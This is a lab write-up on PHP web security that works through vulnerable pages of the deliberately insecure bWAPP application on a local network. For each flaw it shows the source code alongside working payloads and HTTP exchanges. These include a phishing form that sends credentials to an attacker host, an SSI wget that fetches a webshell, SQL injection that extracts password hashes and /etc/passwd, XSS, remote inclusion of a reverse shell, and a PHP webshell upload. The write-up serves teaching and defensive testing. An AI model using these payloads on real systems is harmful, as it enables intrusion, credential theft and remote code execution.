Practical PHP Security

Author: Andrey Stoykov

https://infosecresearchlab.blogspot.com/

Injection Issues

HTML Injection - Stored

http://192.168.56.105/bWAPP/htmli_stored.php

User is able to inject arbitrary HTML code in the page.

Source Code for htmli_stored.php:

[..]
// Insert SQL statement
$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" .
$entry . "','" . $owner . "')";

$recordset = $link->query($sql);

if(!$recordset)
{
die("Error: " . $link->error . "<br /><br />");
}
[..]
$link->close();
?>

The INSERT INTO statement inserts data in two ways. First one is by
specifying both the column names and values to be inserted.

INSERT INTO table_name (column1, column2 ...) values (value1, value2 ...);

Method two involves adding values for all the columns in the table, then
specifying column names in the SQL is not needed.

INSERT INTO table_name values (value1, value2 ...);

Insert user value for the entry parameter into the "blog" table
$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry .
"','" . $owner . "')";

Payload used
<b>Session Has Expired</b>
<form action="http://192.168.56.1:8000" method="get">
<label for="uname">Username:</label>

1
<input type="text" id="uname" name="uname"><br><br>
<label for="pwd">Password:</label>
<input type="text" id="pwd" name="pwd"><br><br>
<input type="submit" value="Submit">
</form>

HTTP POST request with the payload

POST /bWAPP/htmli_stored.php HTTP/1.1
Host: 192.168.56.105
[..]

entry=[PAYLOAD_HERE]&blog=submit&entry_add=

HTTP response showing the user input is not sanitized prior to being
displayed on the page
HTTP/1.1 200 OK
[..]
<td><b>Session Has Expired</b>
<form action="http://192.168.56.1:8000" method="get">
<label for="uname">Username:</label>
<input type="text" id="uname" name="uname"><br><br>
<label for="pwd">Password:</label>
<input type="text" id="pwd" name="pwd"><br><br>
<input type="submit" value="Submit">
</form></td>
[..]

Figure 1: User credentials being phished.

2
Iframe Injection

http://192.168.56.105/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWi
dth=250&ParamHeight=250

With Iframe injection attacker can trick a user into visiting attacker
controlled page which can potentially steal unsuspecting user credentials.

Source Code for iframei.php:

[..]
// Basic check for GET parameters being set in request
if(!(isset($_GET["ParamUrl"])) || !(isset($_GET["ParamHeight"]))
|| !(isset($_GET["ParamWidth"])))
{
header("Location:
iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250");

exit;

Payload used (same as the HTMLi one)

<td><b>Session Has Expired</b>
<form action="http://192.168.56.1:8000" method="get">
<label for="uname">Username:</label>
<input type="text" id="uname" name="uname"><br><br>
<label for="pwd">Password:</label>
<input type="text" id="pwd" name="pwd"><br><br>
<input type="submit" value="Submit">
</form></td>

HTTP GET request to include Iframe hosted on attacker site

GET
/bWAPP/iframei.php?ParamUrl=http://192.168.56.1:8000/iframe.html&Par
amWidth=250&ParamHeight=250 HTTP/1.1
Host: 192.168.56.105
[..]

HTTP response showing the malicious iframe being included in the source
tag
HTTP/1.1 200 OK
[..]
<div id="main">
<h1>iFrame Injection</h1>
<iframe frameborder="0" src="http://192.168.56.1:8000/iframe.html"
height="250" width="250"></iframe>
</div>

3
Figure 2: Attacker controlled iframe being included into the site for
credential harvesting

OS Command Injection

http://192.168.56.105/bWAPP/commandi.php

Executing arbitrary OS commands on the host.

Source Code commandi.php:

[..]
<?php

if(isset($_POST["target"]))
{
$target = $_POST["target"];

if($target == "")
{
echo "<font color=\"red\">Enter a domain name...</font>";
}
else
{
echo "<p align=\"left\">" . shell_exec("nslookup " .
commandi($target)) . "</p>";
}
}
?>

The shell_exec() executes command via the shell and returns the
complete output as a string.

Payload used to chain the nslookup with the pwd command together
&& pwd

4
Simple POST request to issue a ping to the host
POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.56.105
[..]
target=%26%26pwd&form=submit

HTTP response displaying the current working directory

HTTP/1.1 200 OK
[..]
<p align="left">
/var/www/bWAPP
</p>
[..]

PHP Code Injection

http://192.168.56.105/bWAPP/phpi.php

Injecting code that is executed by the application via the eval() function.
This attack is only limited to the functionality of the language in which the
vulnerability resides.

Source Code for phpi.php:

[..]
if(isset($_REQUEST["message"]))
{
if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] !=
"2")
{
?>
<p><i><?php @eval ("echo " . $_REQUEST["message"] .
";");?></i></p>
[..]

The Javascript function eval() evaluates or executes argument. If

argument is expression, eval() evaluates the expression. If argument is
one or more Javascript statements, eval() executes the statements.

Payload used to issue the Linux "id" command

; system('id')

The system() in PHP executes command and output.

HTTP GET request

GET /bWAPP/phpi.php?message=test;%20system(%27id%27) HTTP/1.1
Host: 192.168.56.105
[..]

5
HTTP response
HTTP/1.1 200 OK
[..]
<p><i>testuid=33(www-data) gid=33(www-data) groups=33(www-
data)</i></p>
[..]

Security checks being done

<?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES,
"UTF-8");;?>

Server Side Includes Injection (SSI)

http://192.168.56.105/bWAPP/ssii.php

SSI are directives used to incorporate HTML page with dynamic contents.
SSIs can be used to execute actions before the current page is loaded or
while the current page is being virtualized.

Source Code for ssii.php:

{
$line = '<p>Hello ' . $firstname . ' ' . $lastname . ',</p><p>Your IP
address is:' . '</p><h1><!--#echo var="REMOTE_ADDR" --></h1>';

// Writes a new line to the file

$fp = fopen("ssii.shtml", "w");
fputs($fp, $line, 200);
fclose($fp);

header("Location: ssii.shtml");

exit;
}

The fopen() binds a name resource specified by filename to a stream

$fp = fopen("ssii.shtml", "w");

The fputs() is alias for fwrite(). The fwrite() writes to an open file
fputs($fp, $line, 200);

The fclose() function closes an open file

fclose($fp);

Payload used to fetch webshell from attacker webserver

<!--#exec cmd="wget http://192.168.56.1/shell.php"-->

6
HTTP POST request
POST /bWAPP/ssii.php HTTP/1.1
Host: 192.168.56.105
[..]

firstname=Test&lastname=%3C%21--
%23exec+cmd%3D%22wget+https%3A%2F%2F2.zoppoz.workers.dev%3A443%2Fhttp%2F192.168.56.1%2Fshell.php
+--%3E&form=submit

Figure 3: The payload fetching webshell from attacker webserver

Figure 4: Triggering the webshell functionality

SQL Injection AJAX

http://192.168.56.105/bWAPP/sqli_10-1.php

SQL injection enables attacker to gain sensitive information by adding

malicious SQL queries to the original ones therefore subverting the
application functionality.

Source Code for sqli_10-2.php:

$title = $_GET["title"];
$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";
$recordset = mysql_query($sql, $link);
if(mysql_num_rows($recordset) != 0)
{
while($row = mysql_fetch_array($recordset))
{
$movies[] = $row;
}

7
}
[..]

The LIKE operation is used in WHERE clause to search for specified pattern
in a column. The % (percent) sign represents one or multiple characters
SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'

User input e.g. test, lands in the SQL query

SELECT * FROM movies WHERE title LIKE '%test%'

HTTP GET request with a single quote (') after being placed after title
parameter
GET /bWAPP/sqli_10-2.php?title=%27 HTTP/1.1
Host: 192.168.56.105
[..]

HTTP response shows an MySQL error

HTTP/1.1 200 OK
[..]
<b>Warning</b>: mysql_num_rows(): supplied argument is not a valid
MySQL result resource in <b>/var/www/bWAPP/sqli_10-2.php</b> on line
<b>70</b>
[..]

Going back to the sqli_10-2.php file at line #70

if(mysql_num_rows($recordset) != 0)
{

while($row = mysql_fetch_array($recordset))
{
$movies[] = $row;
}

The mysql_num_rows() function returns number of rows in result set

mysql_num_rows()

The mysql_fetch_array() function returns row from recordset as

associative array or number array
mysql_fetch_array()

Determining vulnerable columns in query using the following payload (url

encoded)
1'+union+all+select+1,2,3,4,5,6,7,8%23

HTTP GET request

GET /bWAPP/sqli_10-2.php?title=1'+union+all+select+1,2,3,4,5,6,7,8%23
HTTP/1.1
Host: 192.168.56.105
[..]

8
The response results in error indicating that the incorrect number of
columns is supplied (8)
HTTP/1.1 200 OK
[..]
<b>Warning</b>: mysql_num_rows(): supplied argument is not a valid
MySQL result resource in <b>/var/www/bWAPP/sqli_10-2.php</b> on line
<b>70</b>
[..]

Determining vulnerable columns in query using the following payload (url

encoded)
1'+union+all+select+1,2,3,4,5,6,7%23

HTTP GET request

GET /bWAPP/sqli_10-2.php?title=1'+union+all+select+1,2,3,4,5,6,7%23
HTTP/1.1
Host: 192.168.56.105
[..]

This time the HTTP response is different, which includes valid data in JSON
format
HTTP/1.1 200 OK
[..]
Content-Type: text/json; charset=utf-8
[{"0":"1","id":"1","1":"2","title":"2","2":"3" [..]

Payload used
1 union all select database(), user(), version(), @@datadir, 5, 6,7#

// URL encoded
1'+union+all+select+database(),user(),version(),@@datadir,5,6,7%23

Return name current and default database using the database() function.
If there is no current database, it returns NULL or " "
database()

Return current username and hostname for the MySQL connection using
the user() function
user()

Return current version of the MySQL database as a string

version()

Check the data directory using the @@datadir

@@datadir

9
HTTP GET request
GET /bWAPP/sqli_10-
2.php?title=1'+union+all+select+database(),user(),version(),@@datadir,
5,6,7%23 HTTP/1.1
Host: 192.168.56.105
[..]

HTTP response
HTTP/1.1 200 OK
Content-Type: text/json; charset=utf-8
[..]
"0":"bWAPP",
"1":"root@localhost",
"2":"5.0.96-0ubuntu3",
"release_year":"5.0.96-0ubuntu3",
"3":"\/var\/lib\/mysql\/"
[..]

Get the password hash for the root user on the MySQL DB instance
1' union all select host, user, password,4,5,6,7 from mysql.user#

// Above payload URL encoded

1'+union+all+select+host,+user,+password,4,5,6,7+from+mysql.user%2
3

The mysql.user table contains information about users that have

permissions to access the MySQL server.

HTTP GET request

GET /bWAPP/sqli_10-
2.php?title=1'+union+all+select+host,+user,+password,4,5,6,7+from+m
ysql.user%23
[..]

HTTP response containing the root user from the MySQL db hash
HTTP/1.1 200 OK
[..]
"title":"root",
"2":"*07BDCCE30E93A12AA2B693FD99990F044614A3E5",

Payload to read the /etc/passwd file contents

1' union all select load_file('/etc/passwd'),2,3,4,5,6,7#

// URL encoded
1'+union+all+select+load_file('/etc/passwd'),2,3,4,5,6,7%23

The MySQL load_file() reads file and returns the file contents as a string. It
requires the full path name to the file e.g. /etc/passwd
load_file()

10
HTTP response with the contents of the /etc/passwd file
HTTP/1.1 200 OK
[..]
"0":"root:x:0:0:root:\/root:\
[..]

SQL Injection Authentication Bypass

http://192.168.56.105/bWAPP/sqli_3.php

Bypassing authentication mechanism via SQL injection vulnerability.

Source Code for sqli_3.php:

<?php

if(isset($_POST["form"]))
{
$login = $_POST["login"];
$login = sqli($login);

$password = $_POST["password"];
$password = sqli($password);

$sql = "SELECT * FROM heroes WHERE login = '" . $login . "' AND
password = '" . $password . "'";

// echo $sql;
$recordset = mysql_query($sql, $link);

if(!$recordset)

die("Error: " . mysql_error());

}

else
{
$row = mysql_fetch_array($recordset);

if($row["login"])
{
// $message = "<font color=\"green\">Welcome " .
ucwords($row["login"]) . "...</font>";
$message = "<font color=\"green\">Welcome " .
ucwords($row["login"]) . ".Your secret: <b>" . ucwords($row["secret"]) .
"</b></font>";
// $message = $row["login"];
}

11
 else
{

$message = "<font color=\"red\">Invalid credentials!</font>";

}
}
[..]

The SQL query check the "heroes" table for any login and password
supplied
$sql = "SELECT * FROM heroes WHERE login = '" . $login . "' AND
password = '" . $password . "'

In order to exploit the vulnerability need to comment the first quote for
the "login" and then introduce an attacker controller query which would
bypass authentication since 1=1 is always TRUE statement.

SELECT * FROM heroes WHERE login= ' ' OR 1=1-- - AND password = '" .
$password

Payload used
' or 1=1-- -

HTTP POST request with the payload

POST /bWAPP/sqli_3.php HTTP/1.1
Host: 192.168.56.105
[..]
login=%27+OR+1%3D1--+-&password=&form=submit

HTTP response indicating successful bypass

HTTP/1.1 200 OK
[..]
<p>Welcome <b>Neo</b>, how are you today?</p><p>Your secret:
<b>Oh Why Didn't I Took That BLACK Pill?</b>

SQLite Injection

http://192.168.56.105/bWAPP/sqli_11.php

Injecting SQL statements in SQLite database in order to gather

information from the backend.

Source Code for sqli_11.php:

<?php

if(isset($_GET["title"]))
{
$title = $_GET["title"];

12
 $db = new PDO("sqlite:".$db_sqlite);

$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

$recordset = $db->query($sql);

if(!$recordset)
{
?>

The SQL query selects from the "movies" table, a title using the following
statement
SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'

HTTP GET request using a single quote

GET /bWAPP/sqli_11.php?title=%27&action=search HTTP/1.1
Host: 192.168.56.105
[..]

HTTP Response results a database error of "HY000"

HTTP/1.1 200 OK
[..]
<td colspan="5" width="580">Error: HY000

Finding the right number of vulnerable columns in the SQL query using
ORDER BY
' order by 7--+- // returns error
' order by 6--+- // returns valid list of movies

Using the following payload to get the tables in the SQLite database
test' union select 1,tbl_name,3,4,5,6 from sqlite_master where
type='table' and tbl_name not like 'sqlite_%'--+-

The sqlite_master is a "schema table" that stores the schema for the
database. The schema database is description of all other tables and
indexes.

Figure 5: Tables being displayed as result of SQLi payload

13
Payload to extract column names
test' union select 1,sql,3,4,5,6 from sqlite_master where type!='meta' and
sql not null and name not like 'sqlite_%' and name='users'--+-

Figure 6: Column names as a result of payload

Gather the information for "login, password and email" from the "users"
table
test' union select 1,login,password,email,5,6 from users--+-

Figure 7: User credentials

XPATH Injection

http://192.168.56.105/bWAPP/xmli_2.php

Similar to SQL injection, the vulnerability allows attacker to construct

XPATH queries from user input to query and naviate XML documents.

Source Code for xmli_2.php:

<?php

if(isset($_REQUEST["genre"]))
{
$genre = $_REQUEST["genre"];
$genre = xmli($genre);

$xml = simplexml_load_file("passwords/heroes.xml");

$result = $xml->xpath("//hero[contains(genre, '$genre')]/movie");

[..]

14
The simple_xml_load_file() function converts XML file into object, then
output keys and elements of the object, which in this case is the contents
from "heroes.xml" file
$xml = simplexml_load_file("passwords/heroes.xml");

XPATH query being used

$result = $xml->xpath("//hero[genre = '$genre']/movie");

Based on the XPATH query mentioned above, the following breakdown of

the query can be done:

Select all "hero" elements in the document

//hero

WHERE the title elements have the "genre" attribute within the "movie"
root element
[genre = '$genre']/movie

HTTP GET request with a single quote to trigger an exception

GET /bWAPP/xmli_2.php?genre=action'&action=search HTTP/1.1
Host: 192.168.56.105
[..]

HTTP response contains verbose XPATH error

HTTP/1.1 200 OK
[..]
<b>Warning</b>: SimpleXMLElement::xpath() [<a
href='function.SimpleXMLElement-xpath'>function.SimpleXMLElement-
xpath</a>]: Invalid expression in <b>/var/www/bWAPP/xmli_2.php</b>
on line <b>158</b>

The SimpleXMLElement::xpath() runs XPATH query on XML data.

Will use XCAT tool to detect the XPATH injection

xcat detect --method=GET --headers=cookies.txt
http://192.168.56.105/bWAPP/xmli_2.php genre genre=action --true-
string=Thor

Using the "detect" option to check whether the application is vulnerable.

The "--headers" option contains the cookies required to login to the
application. Next is the vulnerable parameter which in this case is "genre"
and the vulnerable query "genre=action". The option "--true-string=Thor"
is required to detect if the condition is true.

Running the tool reveals that XCAT has successfully identified the
injection point

15
Figure 8: XCAT detected the XPATH injection

Running XCAT to gather the information

xcat run --method=GET --headers=cookies.txt
http://192.168.56.105/bWAPP/xmli_2.php genre genre=action --true-
string=Thor

Figure 9: Gathering the users information

Cross Site Scripting (XSS) Issues

Reflected XSS (Back Button)

http://192.168.56.105/bWAPP/xss_back_button.php

Source Code for xss_back_button.php:

<div id="main">

<h1>XSS - Reflected (Back Button)</h1>

<p>Click the button to go to back to the previous page:

<input type=button value="Go back"

onClick="document.location.href='<?php echo
isset($_SERVER["HTTP_REFERER"]) ? xss($_SERVER["HTTP_REFERER"]) :
""?>'">

16
The "document.location" is a read only property that returns a "Location"
object, which contains information about the URL of the docuemnt and
provides methods for changing that URL and loading another URL.

The isset() determines if a variable is declared and is different than NULL.

The $_SERVER is array which conains information about the headers. The
HTTP_REFERER is the address of the page which referred the user-agent
to the current page.

onClick="document.location.href='<?php echo
isset($_SERVER["HTTP_REFERER"]) ? xss($_SERVER["HTTP_REFERER"]) :
""?>

Payload used in the "Referer" header

javascript:alert(`xss`)

HTTP GET request with the XSS included in the Referer header
GET /bWAPP/xss_back_button.php HTTP/1.1
Host: 192.168.56.105
[..]
Referer: javascript:alert(`xss`)

HTTP Response indicates that the user input has been reflected in the
document.location.href value
HTTP/1.1 200 OK
[..]
<p>Click the button to go to back to the previous page:

<input type=button value="Go back"

onClick="document.location.href='javascript:alert(`xss`)'">

</p>
[..]

Clicking on the "Go Back" button afterwards triggers the XSS payload

Figure 10: XSS payload triggered

17
Reflected XSS eval()

http://192.168.56.105/bWAPP/xss_eval.php?date=Date()

The eval() function evaluates a string as PHP code. The string must be
valid PHP code and must end with semicolon.

Source Code for xss_eval.php:

<script>
eval("document.write(<?php echo xss($_GET["date"])?>)");
</script>

The eval() construct allows execution of arbitrary PHP code. The

document.write() is used to write into the HTML output.
eval("document.write(<?php echo xss($_GET["date"])?>)");

Payload used to display the session cookies

alert(document.cookie)

Figure 11: XSS payload to display session cookies

XSS Reflected HREF

http://192.168.56.105/bWAPP/xss_href-1.php

Source Code for xss_href-2.php:

$message = "";

if(isset($_GET["name"]) and $_GET["name"] != "")

{
$name = $_GET["name"];
$message = "<p>Hello " . ucwords(xss_check_3($name)) . ", please
vote for your favorite movie.</p>";
$message.= "<p>Remember, Tony Stark wants to win every
time...</p>";
}
else
18
{
header("Location: xss_href-1.php");
exit;

The "<a>" tag defines a hyperlink which is used to link from one page to
another. The important attribute of "<a>" element is the "href" attribute
which indicates the links destination.
<a href=

HTTP GET request

GET /bWAPP/xss_href-2.php?name=test&action=vote HTTP/1.1
Host: 192.168.56.105
[..]

HTTP Response where the "test" value is echoed in the href tag
HTTP/1.1 200 OK
[..]
<td align="center">
<a href=xss_href php?movie=1&name=test&action=vote>
Vote</a></td>
[..]

Payload used
XSS><script>alert(1)</script>

XSS is the required "name". The ">" closes the tag where just before the
payload is introduced so the script can get executed.

<td align="center"> <a href=xss_href-

3.php?movie=1&name=XSS><script>alert(1)</script>&action=vote>Vot
e</a></td>

XSS PHP_SELF

http://192.168.56.105/bWAPP/xss_php_self.php

Source Code for xss_php_self.php:

<form action="<?php echo xss(($_SERVER["PHP_SELF"]));?>"
method="GET">
[..]
<?php
if(isset($_GET["form"]) && isset($_GET["firstname"]) &&
isset($_GET["lastname"]))
{
$firstname = $_GET["firstname"];
$lastname = $_GET["lastname"];
else
{

19
 echo "Welcome " . xss($firstname) . " " . xss($lastname);

$_SERVER is PHP super global variable which holds information about

headers, paths and script locations. The $_SERVER['PHP_SELF'] returns
filename of currently executing script.

<form action="<?php echo xss(($_SERVER["PHP_SELF"]));?>"

method="GET">

HTTP GET request

GET
/bWAPP/xss_php_self.php?firstname=Name&lastname=XSS&form=submit
HTTP/1.1
Host: 192.168.56.105
[..]

HTTP response shows the "XSS" for lastname is reflected within the "div"
tag.
HTTP/1.1 200 OK
[..]
<div id="main">
[..]
Welcome Name XSS
</div>

Payload used
XSS"><BODY ONLOAD=alert('XSS')>

The "onload" attribute is triggered when an object has been loaded.

Sensitive Data Exposure

HTML5 Web Page Storage

http://192.168.56.105/bWAPP/insecure_crypt_storage_1.php

HTML Web Storage is used by application to store data locally within the
users browser. The storage limit is 5MB and information is not transferred
to the server. The "localStorage" stores data with no expiration date.

Source Code for insecure_crypt_storage_1.php:

if(typeof(Storage) !== "undefined")
{
localStorage.login = "<?php echo $_SESSION["login"]?>";
localStorage.secret = "<?php if($_COOKIE["security_level"] != "1" and
$_COOKIE["security_level"] != "2"){echo $secret;} else{echo hash("sha1",
$secret);}?>";

20
The "localStorage" object stores data with no expiration date.
localStorage.login = "<?php echo $_SESSION["login"]?>";

Figure 12: Values being stored in the browsers localStorage

Text Files (Accounts)

http://192.168.56.105/bWAPP/insecure_crypt_storage_2.php

The user input is stored in text format without any hashing being
performed prior.

Source Code for insecure_crypt_storage_2.php:

$fp = fopen("passwords/accounts.txt", "a");
fputs($fp, $line, 200);
fclose($fp);
$record_added = true;

The fopen() function opens a file or URL. The parameter values are as
follows:
fopen(filename, mode, include_path, context)

In the above source code the user input is stored at the "passwords"
directory in the "accounts.txt" file.
$fp = fopen("passwords/accounts.txt", "a");

HTTP POST request

POST /bWAPP/insecure_crypt_storage_2.php HTTP/1.1
Host: 192.168.56.105
[..]
username=test&password=test&insert=Insert

HTTP Response
HTTP/1.1 200 OK
[..]
<font color="green">The account was added!</font><br /><br />
<a href="passwords/accounts.txt" target="_blank">Download</a> the
file.<br />
[..]

21
Missing Functional Level Access Control

RFI

http://192.168.56.105/bWAPP/rlfi.php

Remote File Inclusion allow the inclusion of remote files hosted on

attacker webserver which results in code execution.

HTTP GET request which includes remotely hosted file of "revshell.php"

GET
/bWAPP/rlfi.php?language=http://192.168.56.1:8000/revshell.php&action=
go HTTP/1.1
Host: 192.168.56.105
[..]

HTTP GET request results in webserver fetching the remotely hosted

malicious webshell file.

Figure 13: File being requested from remote host

The reverse connection is established to the attacker listeners on port

4444 TCP.

Figure 14: Receiving a reverse connection

Unvalidated Redirects and Forwards

http://192.168.56.105/bWAPP/unvalidated_redir_fwd_1.php

Unvalidated redirects and forwards are possible when application accepts

untrusted input that could cause the web application to redirect the
request to URL contained within untrusted input.

Source Code for unvalidated_redir_fwd_1.php:

switch($_REQUEST["url"])
{
case "1" :
header("Location: http://itsecgames.blogspot.com");
break;
[..]

22
The header() function sends raw HTTP header to the client.

HTTP GET request

GET
/bWAPP/unvalidated_redir_fwd_1.php?url=http://192.168.56.1/index.html&
form=submit HTTP/1.1
Host: 192.168.56.105
[..]

HTTP response showing the redirect to attacker site

HTTP/1.1 302 Found
[..]
Location: http://192.168.56.1/index.html

Figure 15: User being redirected to attacker site

Unrestricted File Upload

http://192.168.56.105/bWAPP/unrestricted_file_upload.php

Unrestricted file upload results in attacker being able to upload malicious

file resulting in code execution on the system.

Source Code for unrestricted_file_upload.php:

<?php

if(isset($_POST["form"]))
{

if(!$file_error)
{

echo "The image has been uploaded <a href=\"images/" .

$_FILES["file"]["name"] . "\" target=\"_blank\">here</a>.";

23
 else
{
echo "<font color=\"red\">" . $file_error . "</font>";
}
}
?>

Furthermore the code shows that no validation is being made for case "0"
which is Low level.
[..]
switch($_COOKIE["security_level"])
{

case "0" :

move_uploaded_file($_FILES["file"]["tmp_name"], "images/" .
$_FILES["file"]["name"]);

break;
[..]

HTTP POST request to the upload a webshell.php

POST /bWAPP/unrestricted_file_upload.php HTTP/1.1
Host: 192.168.56.105
[..]
-----------------------------436437295261609600538611414
Content-Disposition: form-data; name="file"; filename="webshell.php"
Content-Type: application/x-php

<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>
[..]

HTTP response shows the webshell has been successfully uploaded

HTTP/1.1 200 OK
[..]
<br />
The image has been uploaded <a href="images/webshell.php"
target="_blank">here</a>
</div>

24
Triggering the webshell

Figure 16: Achieving code execution on the webserver via webshell

25